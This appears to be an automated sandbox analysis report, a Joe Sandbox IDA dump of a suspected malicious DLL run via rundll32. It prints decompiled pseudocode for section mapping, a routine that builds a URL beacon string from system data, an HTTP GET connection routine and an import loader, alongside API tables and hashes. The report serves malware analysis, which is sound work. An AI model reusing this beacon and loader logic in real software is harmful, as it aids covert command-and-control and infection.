                                • API ID: Section$CreateViewmemset
                                • String ID:
                                • API String ID: 2533685722-0
                                • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                • Instruction ID: fe2f3e31c046bd23ac8d7a6a98a55de3279538490a8acc8e42f184ee6449d455
                                • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                • Instruction Fuzzy Hash: 61211DB1D0020DAFDB11DFA9C8849EEFBF9EF48354F108869E646F3210D7319A488B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E01066D0A(void** __esi, PVOID* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				long _t13;
                                
                                				_v16 = 0;
                                				asm("stosd");
                                				_v8 = 0;
                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                				if(_t13 < 0) {
                                					_push(_t13);
                                					return __esi[6]();
                                				}
                                				return 0;
                                			}







                                0x01066d1c
                                0x01066d22
                                0x01066d30
                                0x01066d37
                                0x01066d3c
                                0x01066d42
                                0x00000000
                                0x01066d43
                                0x00000000

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0106197E,00000002,00000000,?,?,00000000,?,?,0106197E,00000000), ref: 01066D37
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: 57a1e70bc2e68889d694d883e872df9dd5a49e0d78d393d3750a06833998c0cb
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: 66F01CB690020CBFEB119FA5CC85CAFBBFDEB44294B104939F252E5090D6319E488A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 70%
                                			E010656C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                                				intOrPtr _v4;
                                				intOrPtr _v8;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				void* _v48;
                                				intOrPtr _v56;
                                				void* __edi;
                                				intOrPtr _t32;
                                				void* _t33;
                                				intOrPtr _t35;
                                				intOrPtr _t36;
                                				intOrPtr _t37;
                                				intOrPtr _t38;
                                				intOrPtr _t39;
                                				void* _t42;
                                				intOrPtr _t43;
                                				int _t46;
                                				intOrPtr _t47;
                                				int _t50;
                                				void* _t51;
                                				intOrPtr _t55;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t66;
                                				intOrPtr* _t68;
                                				void* _t69;
                                				intOrPtr _t74;
                                				intOrPtr _t80;
                                				intOrPtr _t83;
                                				intOrPtr _t86;
                                				int _t89;
                                				intOrPtr _t90;
                                				int _t93;
                                				intOrPtr _t95;
                                				int _t98;
                                				intOrPtr _t100;
                                				int _t103;
                                				void* _t105;
                                				void* _t106;
                                				void* _t110;
                                				void* _t112;
                                				void* _t113;
                                				intOrPtr _t114;
                                				long _t116;
                                				intOrPtr* _t117;
                                				intOrPtr* _t118;
                                				long _t119;
                                				int _t120;
                                				void* _t121;
                                				void* _t122;
                                				void* _t123;
                                				void* _t126;
                                				void* _t127;
                                				void* _t129;
                                				void* _t130;
                                
                                				_t110 = __edx;
                                				_t106 = __ecx;
                                				_t127 =  &_v16;
                                				_t119 = __eax;
                                				_t32 =  *0x106a3e0; // 0x5109b78
                                				_v4 = _t32;
                                				_v8 = 8;
                                				_t33 = RtlAllocateHeap( *0x106a2d8, 0, 0x800); // executed
                                				_t105 = _t33;
                                				if(_t105 != 0) {
                                					if(_t119 == 0) {
                                						_t119 = GetTickCount();
                                					}
                                					_t35 =  *0x106a018; // 0xd96449c3
                                					asm("bswap eax");
                                					_t36 =  *0x106a014; // 0x3a87c8cd
                                					asm("bswap eax");
                                					_t37 = E0106A010; // 0xd8d2f808
                                					asm("bswap eax");
                                					_t38 =  *0x106a00c; // 0x8f8f86c2
                                					asm("bswap eax");
                                					_t39 =  *0x106a348; // 0x409d5a8
                                					_t3 = _t39 + 0x106b62b; // 0x74666f73
                                					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x106a02c,  *0x106a004, _t119);
                                					_t42 = E01066927();
                                					_t43 =  *0x106a348; // 0x409d5a8
                                					_t4 = _t43 + 0x106b66b; // 0x74707526
                                					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
                                					_t129 = _t127 + 0x38;
                                					_t121 = _t120 + _t46;
                                					if(_a12 != 0) {
                                						_t100 =  *0x106a348; // 0x409d5a8
                                						_t8 = _t100 + 0x106b676; // 0x732526
                                						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
                                						_t129 = _t129 + 0xc;
                                						_t121 = _t121 + _t103;
                                					}
                                					_t47 =  *0x106a348; // 0x409d5a8
                                					_t10 = _t47 + 0x106b2de; // 0x74636126
                                					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
                                					_t130 = _t129 + 0xc;
                                					_t122 = _t121 + _t50; // executed
                                					_t51 = E010622D7(_t106); // executed
                                					_t112 = _t51;
                                					if(_t112 != 0) {
                                						_t95 =  *0x106a348; // 0x409d5a8
                                						_t12 = _t95 + 0x106b8d0; // 0x736e6426
                                						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
                                						_t130 = _t130 + 0xc;
                                						_t122 = _t122 + _t98;
                                						HeapFree( *0x106a2d8, 0, _t112);
                                					}
                                					_t113 = E01062A11();
                                					if(_t113 != 0) {
                                						_t90 =  *0x106a348; // 0x409d5a8
                                						_t14 = _t90 + 0x106b8d8; // 0x6f687726
                                						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
                                						_t130 = _t130 + 0xc;
                                						_t122 = _t122 + _t93;
                                						HeapFree( *0x106a2d8, 0, _t113);
                                					}
                                					_t114 =  *0x106a3cc; // 0x51095b0
                                					_a20 = E01062509(0x106a00a, _t114 + 4);
                                					_t55 =  *0x106a370; // 0x0
                                					_t116 = 0;
                                					if(_t55 != 0) {
                                						_t86 =  *0x106a348; // 0x409d5a8
                                						_t17 = _t86 + 0x106b8b2; // 0x3d736f26
                                						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
                                						_t130 = _t130 + 0xc;
                                						_t122 = _t122 + _t89;
                                					}
                                					_t56 =  *0x106a36c; // 0x0
                                					if(_t56 != _t116) {
                                						_t83 =  *0x106a348; // 0x409d5a8
                                						_t19 = _t83 + 0x106b889; // 0x3d706926
                                						wsprintfA(_t122 + _t105, _t19, _t56);
                                					}
                                					if(_a20 != _t116) {
                                						_t123 = RtlAllocateHeap( *0x106a2d8, _t116, 0x800);
                                						if(_t123 != _t116) {
                                							E01061BE9(GetTickCount());
                                							_t62 =  *0x106a3cc; // 0x51095b0
                                							__imp__(_t62 + 0x40);
                                							asm("lock xadd [eax], ecx");
                                							_t66 =  *0x106a3cc; // 0x51095b0
                                							__imp__(_t66 + 0x40);
                                							_t68 =  *0x106a3cc; // 0x51095b0
                                							_t69 = E01061D33(1, _t110, _t105,  *_t68); // executed
                                							_t126 = _t69;
                                							asm("lock xadd [eax], ecx");
                                							if(_t126 != _t116) {
                                								StrTrimA(_t126, 0x106928c);
                                								_push(_t126);
                                								_t74 = E0106393C();
                                								_v20 = _t74;
                                								if(_t74 != _t116) {
                                									_t117 = __imp__;
                                									 *_t117(_t126, _v8);
                                									 *_t117(_t123, _v8);
                                									_t118 = __imp__;
                                									 *_t118(_t123, _v32);
                                									 *_t118(_t123, _t126);
                                									_t80 = E0106375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
                                									_v56 = _t80;
                                									if(_t80 != 0 && _t80 != 0x10d2) {
                                										E0106561E();
                                									}
                                									HeapFree( *0x106a2d8, 0, _v48);
                                									_t116 = 0;
                                								}
                                								HeapFree( *0x106a2d8, _t116, _t126);
                                							}
                                							RtlFreeHeap( *0x106a2d8, _t116, _t123); // executed
                                						}
                                						HeapFree( *0x106a2d8, _t116, _a12);
                                					}
                                					RtlFreeHeap( *0x106a2d8, _t116, _t105); // executed
                                				}
                                				return _v16;
                                			}





























































                                0x010656c8
                                0x010656c8
                                0x010656c8
                                0x010656dd
                                0x010656df
                                0x010656e4
                                0x010656e8
                                0x010656f0
                                0x010656f6
                                0x010656fa
                                0x01065702
                                0x0106570a
                                0x0106570a
                                0x0106570c
                                0x01065718
                                0x01065727
                                0x0106572c
                                0x0106572f
                                0x01065734
                                0x01065737
                                0x0106573c
                                0x0106573f
                                0x0106574b
                                0x01065758
                                0x0106575a
                                0x01065760
                                0x01065765
                                0x01065770
                                0x01065772
                                0x01065775
                                0x0106577b
                                0x0106577d
                                0x01065786
                                0x01065791
                                0x01065793
                                0x01065796
                                0x01065796
                                0x01065798
                                0x0106579d
                                0x010657a9
                                0x010657ab
                                0x010657ae
                                0x010657b0
                                0x010657b5
                                0x010657b9
                                0x010657bb
                                0x010657c0
                                0x010657cc
                                0x010657ce
                                0x010657da
                                0x010657dc
                                0x010657dc
                                0x010657e7
                                0x010657eb
                                0x010657ed
                                0x010657f2
                                0x010657fe
                                0x01065800
                                0x0106580c
                                0x0106580e
                                0x0106580e
                                0x01065814
                                0x01065827
                                0x0106582b
                                0x01065830
                                0x01065834
                                0x01065837
                                0x0106583c
                                0x01065847
                                0x01065849
                                0x0106584c
                                0x0106584c
                                0x0106584e
                                0x01065855
                                0x01065858
                                0x0106585d
                                0x01065867
                                0x01065869
                                0x01065870
                                0x01065888
                                0x0106588c
                                0x01065898
                                0x0106589d
                                0x010658a6
                                0x010658b7
                                0x010658bb
                                0x010658c4
                                0x010658ca
                                0x010658d2
                                0x010658d7
                                0x010658e4
                                0x010658ea
                                0x010658f6
                                0x010658fc
                                0x010658fd
                                0x01065902
                                0x01065908
                                0x0106590e
                                0x01065915
                                0x0106591c
                                0x01065922
                                0x01065929
                                0x0106592d
                                0x01065938
                                0x0106593d
                                0x01065943
                                0x0106594c
                                0x0106594c
                                0x0106595d
                                0x01065963
                                0x01065963
                                0x0106596d
                                0x0106596d
                                0x0106597b
                                0x0106597b
                                0x0106598c
                                0x0106598c
                                0x0106599a
                                0x0106599a
                                0x010659ab

                                APIs
                                • RtlAllocateHeap.NTDLL ref: 010656F0
                                • GetTickCount.KERNEL32 ref: 01065704
                                • wsprintfA.USER32 ref: 01065753
                                • wsprintfA.USER32 ref: 01065770
                                • wsprintfA.USER32 ref: 01065791
                                • wsprintfA.USER32 ref: 010657A9
                                • wsprintfA.USER32 ref: 010657CC
                                • HeapFree.KERNEL32(00000000,00000000), ref: 010657DC
                                • wsprintfA.USER32 ref: 010657FE
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0106580E
                                • wsprintfA.USER32 ref: 01065847
                                • wsprintfA.USER32 ref: 01065867
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01065882
                                • GetTickCount.KERNEL32 ref: 01065892
                                • RtlEnterCriticalSection.NTDLL(05109570), ref: 010658A6
                                • RtlLeaveCriticalSection.NTDLL(05109570), ref: 010658C4
                                • StrTrimA.SHLWAPI(00000000,0106928C,00000000,051095B0), ref: 010658F6
                                • lstrcpy.KERNEL32(00000000,?), ref: 01065915
                                • lstrcpy.KERNEL32(00000000,?), ref: 0106591C
                                • lstrcat.KERNEL32(00000000,?), ref: 01065929
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0106592D
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0106595D
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0106596D
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,051095B0), ref: 0106597B
                                • HeapFree.KERNEL32(00000000,?), ref: 0106598C
                                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0106599A
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                                • String ID:
                                • API String ID: 2591679948-0
                                • Opcode ID: e1c29358a44abbae4dae4c9bb60d1a0335b1cbaff40907b7a10dc46078690ae7
                                • Instruction ID: 613d5bcf7df948e615307ccdcb7549ddedb494d7c710fdcb2021f4ebf2933562
                                • Opcode Fuzzy Hash: e1c29358a44abbae4dae4c9bb60d1a0335b1cbaff40907b7a10dc46078690ae7
                                • Instruction Fuzzy Hash: D381A171600215EFD731BBA8EC48E963BECEB89714B050524F9C9E7235DA3BE904DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E01067AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
                                				void _v8;
                                				long _v12;
                                				void _v16;
                                				void* _t34;
                                				void* _t38;
                                				void* _t40;
                                				char* _t56;
                                				long _t57;
                                				void* _t58;
                                				intOrPtr _t59;
                                				long _t65;
                                
                                				_t65 = __esi;
                                				_t58 = __ecx;
                                				_v16 = 0xea60;
                                				__imp__( *(__esi + 4));
                                				_v12 = __eax + __eax;
                                				_t56 = E01066D63(__eax + __eax + 1);
                                				if(_t56 != 0) {
                                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                						E01066C2C(_t56);
                                					} else {
                                						E01066C2C( *(__esi + 4));
                                						 *(__esi + 4) = _t56;
                                					}
                                				}
                                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                				 *(_t65 + 0x10) = _t34;
                                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E01067A86) == 0xffffffff) {
                                					L15:
                                					return GetLastError();
                                				} else {
                                					ResetEvent( *(_t65 + 0x1c));
                                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                                					 *(_t65 + 0x14) = _t38;
                                					if(_t38 != 0 || GetLastError() == 0x3e5 && E01066E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                						_t59 =  *0x106a348; // 0x409d5a8
                                						_t15 = _t59 + 0x106b73b; // 0x544547
                                						_v8 = 0x84404000;
                                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                                						 *(_t65 + 0x18) = _t40;
                                						if(_t40 == 0) {
                                							goto L15;
                                						}
                                						_t57 = 4;
                                						_v12 = _t57;
                                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                							_v8 = _v8 | 0x00000100;
                                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                						}
                                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                							goto L15;
                                						} else {
                                							return 0;
                                						}
                                					} else {
                                						goto L15;
                                					}
                                				}
                                			}














                                0x01067af1
                                0x01067af1
                                0x01067afc
                                0x01067b03
                                0x01067b0b
                                0x01067b15
                                0x01067b1b
                                0x01067b2e
                                0x01067b3e
                                0x01067b30
                                0x01067b33
                                0x01067b38
                                0x01067b38
                                0x01067b2e
                                0x01067b4e
                                0x01067b54
                                0x01067b59
                                0x01067c42
                                0x00000000
                                0x01067b74
                                0x01067b77
                                0x01067b8a
                                0x01067b90
                                0x01067b95
                                0x01067bbd
                                0x01067bd0
                                0x01067bda
                                0x01067bdd
                                0x01067be3
                                0x01067be8
                                0x00000000
                                0x00000000
                                0x01067bec
                                0x01067bf8
                                0x01067c09
                                0x01067c0b
                                0x01067c1c
                                0x01067c1c
                                0x01067c2c
                                0x00000000
                                0x01067c3e
                                0x00000000
                                0x01067c3e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01067b95

                                APIs
                                • lstrlen.KERNEL32(?,00000008,76D84D40), ref: 01067B03
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 01067B26
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 01067B4E
                                • InternetSetStatusCallback.WININET(00000000,01067A86), ref: 01067B65
                                • ResetEvent.KERNEL32(?), ref: 01067B77
                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 01067B8A
                                • GetLastError.KERNEL32 ref: 01067B97
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 01067BDD
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 01067BFB
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 01067C1C
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 01067C28
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 01067C38
                                • GetLastError.KERNEL32 ref: 01067C42
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 049a9abc7809a530f8d30ecb97824cab7cd530ff004bc03cc657e58897a73a14
                                • Instruction ID: 020cf9ba7957040e9530a32c71f5de9e490a3fbb7f8877eabf9f66cdcc946baf
                                • Opcode Fuzzy Hash: 049a9abc7809a530f8d30ecb97824cab7cd530ff004bc03cc657e58897a73a14
                                • Instruction Fuzzy Hash: 1C419071600608FFE731AF65DC49E5B7FFDEB84704F104968F682E21A8E6369504CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 97 1067f35-1067f9a 98 1067f9c-1067fb6 RaiseException 97->98 99 1067fbb-1067fe5 97->99 100 106816b-106816f 98->100 101 1067fe7 99->101 102 1067fea-1067ff6 99->102 101->102 103 1067ff8-1068003 102->103 104 1068009-106800b 102->104 103->104 116 106814e-1068155 103->116 105 10680b3-10680bd 104->105 106 1068011-1068018 104->106 108 10680bf-10680c7 105->108 109 10680c9-10680cb 105->109 110 106801a-1068026 106->110 111 1068028-1068035 LoadLibraryA 106->111 108->109 112 10680cd-10680d0 109->112 113 1068149-106814c 109->113 110->111 115 1068078-1068084 InterlockedExchange 110->115 114 1068037-1068047 GetLastError 111->114 111->115 121 10680d2-10680d5 112->121 122 10680fe-106810c GetProcAddress 112->122 113->116 123 1068057-1068073 RaiseException 114->123 124 1068049-1068055 114->124 125 1068086-106808a 115->125 126 10680ac-10680ad FreeLibrary 115->126 119 1068157-1068164 116->119 120 1068169 116->120 119->120 120->100 121->122 127 10680d7-10680e2 121->127 122->113 128 106810e-106811e GetLastError 122->128 123->100 124->115 124->123 125->105 129 106808c-1068098 LocalAlloc 125->129 126->105 127->122 130 10680e4-10680ea 127->130 132 1068120-1068128 128->132 133 106812a-106812c 128->133 129->105 134 106809a-10680aa 129->134 130->122 135 10680ec-10680ef 130->135 132->133 133->113 136 106812e-1068146 RaiseException 133->136 134->105 135->122 137 10680f1-10680fc 135->137 136->113 137->113 137->122
                                C-Code - Quality: 51%
                                			E01067F35(long _a4, long _a8) {
                                				signed int _v8;
                                				intOrPtr _v16;
                                				LONG* _v28;
                                				long _v40;
                                				long _v44;
                                				long _v48;
                                				CHAR* _v52;
                                				long _v56;
                                				CHAR* _v60;
                                				long _v64;
                                				signed int* _v68;
                                				char _v72;
                                				signed int _t76;
                                				signed int _t80;
                                				signed int _t81;
                                				intOrPtr* _t82;
                                				intOrPtr* _t83;
                                				intOrPtr* _t85;
                                				intOrPtr* _t90;
                                				intOrPtr* _t95;
                                				intOrPtr* _t98;
                                				struct HINSTANCE__* _t99;
                                				void* _t102;
                                				intOrPtr* _t104;
                                				void* _t115;
                                				long _t116;
                                				void _t125;
                                				void* _t131;
                                				signed short _t133;
                                				struct HINSTANCE__* _t138;
                                				signed int* _t139;
                                
                                				_t139 = _a4;
                                				_v28 = _t139[2] + 0x1060000;
                                				_t115 = _t139[3] + 0x1060000;
                                				_t131 = _t139[4] + 0x1060000;
                                				_v8 = _t139[7];
                                				_v60 = _t139[1] + 0x1060000;
                                				_v16 = _t139[5] + 0x1060000;
                                				_v64 = _a8;
                                				_v72 = 0x24;
                                				_v68 = _t139;
                                				_v56 = 0;
                                				asm("stosd");
                                				_v48 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
                                				if(( *_t139 & 0x00000001) == 0) {
                                					_a8 =  &_v72;
                                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                					return 0;
                                				}
                                				_t138 =  *_v28;
                                				_t76 = _a8 - _t115 >> 2 << 2;
                                				_t133 =  *(_t131 + _t76);
                                				_a4 = _t76;
                                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                				_v56 = _t80;
                                				_t81 = _t133 + 0x1060002;
                                				if(_t80 == 0) {
                                					_t81 = _t133 & 0x0000ffff;
                                				}
                                				_v52 = _t81;
                                				_t82 =  *0x106a1c0; // 0x0
                                				_t116 = 0;
                                				if(_t82 == 0) {
                                					L6:
                                					if(_t138 != 0) {
                                						L18:
                                						_t83 =  *0x106a1c0; // 0x0
                                						_v48 = _t138;
                                						if(_t83 != 0) {
                                							_t116 =  *_t83(2,  &_v72);
                                						}
                                						if(_t116 != 0) {
                                							L32:
                                							 *_a8 = _t116;
                                							L33:
                                							_t85 =  *0x106a1c0; // 0x0
                                							if(_t85 != 0) {
                                								_v40 = _v40 & 0x00000000;
                                								_v48 = _t138;
                                								_v44 = _t116;
                                								 *_t85(5,  &_v72);
                                							}
                                							return _t116;
                                						} else {
                                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                								L27:
                                								_t116 = GetProcAddress(_t138, _v52);
                                								if(_t116 == 0) {
                                									_v40 = GetLastError();
                                									_t90 =  *0x106a1bc; // 0x0
                                									if(_t90 != 0) {
                                										_t116 =  *_t90(4,  &_v72);
                                									}
                                									if(_t116 == 0) {
                                										_a4 =  &_v72;
                                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                										_t116 = _v44;
                                									}
                                								}
                                								goto L32;
                                							} else {
                                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                									_t116 =  *(_a4 + _v16);
                                									if(_t116 != 0) {
                                										goto L32;
                                									}
                                								}
                                								goto L27;
                                							}
                                						}
                                					}
                                					_t98 =  *0x106a1c0; // 0x0
                                					if(_t98 == 0) {
                                						L9:
                                						_t99 = LoadLibraryA(_v60); // executed
                                						_t138 = _t99;
                                						if(_t138 != 0) {
                                							L13:
                                							if(InterlockedExchange(_v28, _t138) == _t138) {
                                								FreeLibrary(_t138);
                                							} else {
                                								if(_t139[6] != 0) {
                                									_t102 = LocalAlloc(0x40, 8);
                                									if(_t102 != 0) {
                                										 *(_t102 + 4) = _t139;
                                										_t125 =  *0x106a1b8; // 0x0
                                										 *_t102 = _t125;
                                										 *0x106a1b8 = _t102;
                                									}
                                								}
                                							}
                                							goto L18;
                                						}
                                						_v40 = GetLastError();
                                						_t104 =  *0x106a1bc; // 0x0
                                						if(_t104 == 0) {
                                							L12:
                                							_a8 =  &_v72;
                                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                							return _v44;
                                						}
                                						_t138 =  *_t104(3,  &_v72);
                                						if(_t138 != 0) {
                                							goto L13;
                                						}
                                						goto L12;
                                					}
                                					_t138 =  *_t98(1,  &_v72);
                                					if(_t138 != 0) {
                                						goto L13;
                                					}
                                					goto L9;
                                				}
                                				_t116 =  *_t82(0,  &_v72);
                                				if(_t116 != 0) {
                                					goto L33;
                                				}
                                				goto L6;
                                			}


































                                0x01067f44
                                0x01067f5a
                                0x01067f60
                                0x01067f62
                                0x01067f67
                                0x01067f6d
                                0x01067f72
                                0x01067f75
                                0x01067f83
                                0x01067f8a
                                0x01067f8d
                                0x01067f90
                                0x01067f91
                                0x01067f94
                                0x01067f97
                                0x01067f9a
                                0x01067f9f
                                0x01067fae
                                0x00000000
                                0x01067fb4
                                0x01067fbe
                                0x01067fc8
                                0x01067fcd
                                0x01067fcf
                                0x01067fd9
                                0x01067fdc
                                0x01067fdf
                                0x01067fe5
                                0x01067fe7
                                0x01067fe7
                                0x01067fea
                                0x01067fed
                                0x01067ff2
                                0x01067ff6
                                0x01068009
                                0x0106800b
                                0x010680b3
                                0x010680b3
                                0x010680ba
                                0x010680bd
                                0x010680c7
                                0x010680c7
                                0x010680cb
                                0x01068149
                                0x0106814c
                                0x0106814e
                                0x0106814e
                                0x01068155
                                0x01068157
                                0x01068161
                                0x01068164
                                0x01068167
                                0x01068167
                                0x00000000
                                0x010680cd
                                0x010680d0
                                0x010680fe
                                0x01068108
                                0x0106810c
                                0x01068114
                                0x01068117
                                0x0106811e
                                0x01068128
                                0x01068128
                                0x0106812c
                                0x01068131
                                0x01068140
                                0x01068146
                                0x01068146
                                0x0106812c
                                0x00000000
                                0x010680d7
                                0x010680da
                                0x010680e2
                                0x010680f7
                                0x010680fc
                                0x00000000
                                0x00000000
                                0x010680fc
                                0x00000000
                                0x010680e2
                                0x010680d0
                                0x010680cb
                                0x01068011
                                0x01068018
                                0x01068028
                                0x0106802b
                                0x01068031
                                0x01068035
                                0x01068078
                                0x01068084
                                0x010680ad
                                0x01068086
                                0x0106808a
                                0x01068090
                                0x01068098
                                0x0106809a
                                0x0106809d
                                0x010680a3
                                0x010680a5
                                0x010680a5
                                0x01068098
                                0x0106808a
                                0x00000000
                                0x01068084
                                0x0106803d
                                0x01068040
                                0x01068047
                                0x01068057
                                0x0106805a
                                0x0106806a
                                0x00000000
                                0x01068070
                                0x01068051
                                0x01068055
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01068055
                                0x01068022
                                0x01068026
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01068026
                                0x01067fff
                                0x01068003
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01067FAE
                                • LoadLibraryA.KERNEL32(?), ref: 0106802B
                                • GetLastError.KERNEL32 ref: 01068037
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0106806A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: 3ec798d144c1be9514536a1ebd7dfd76b174ea916cb9823d5bd9646609afca64
                                • Instruction ID: 879eb93a0b8088853eccce62ab597053df71fe17f2fa3274757f688a68674695
